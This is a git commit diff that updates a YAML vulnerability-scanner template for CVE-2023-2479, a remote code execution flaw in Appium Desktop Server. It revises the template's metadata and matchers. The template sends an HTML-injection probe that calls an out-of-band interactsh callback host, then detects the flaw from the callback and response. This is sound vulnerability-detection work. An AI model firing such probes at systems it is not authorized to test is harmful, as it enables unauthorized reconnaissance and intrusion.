minor update

2023-09-26 12:33:31 +05:30 · 2023-09-26 12:33:31 +05:30 · ae67cf87ba
parent a711c0cc04
commit ae67cf87ba
1 changed files with 20 additions and 26 deletions
--- a/http/cves/2023/CVE-2023-2479.yaml
+++ b/http/cves/2023/CVE-2023-2479.yaml
@ -1,53 +1,47 @@
 id: CVE-2023-2479

 info:
-  name: Zero Click Remote Code Execution on Appium Desktop Server
-  author: zn9988, Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com)
-  severity: Critical
-  description: Appium Desktop Server is susceptible to an unauthenticated remote code execution vulnerability.
+  name: Appium Desktop Server - Remote Code Execution
+  author: zn9988
+  severity: critical
+  description: |
+    OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
+  remediation: Fixed in v1.22.3-4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2479
+    cwe-id: CWE-78
+    epss-score: 0.0008
+    epss-percentile: 0.3333
+    cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
  reference: 
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
    - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
-  tags: http,rce,dast,oast,cve,electron
+  tags: cve,cve2023,appium,oast,rce

-requests:
+http:
  - method: GET
    path:
      - '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'
      
    matchers-condition: and
    matchers:
-          # Response String
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
        - type: word
          part: body
          words: 
            - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"

-          # Status Code
-        - type: status
-          status:
-            - 404
-            
-          # Content Type
        - type: word
          part: header
          words:
            - "application/json"

-          # Response Header
-        - type: word
-          part: header
-          words:
-            - "X-Powered-By: Express"
-        
-          # Captured the interact callbacks
-        - type: word
-          part: interactsh_protocol
-          condition: or
-          words:
-            - "dns"
-            - "http" 
+        - type: status
+          status:
+            - 404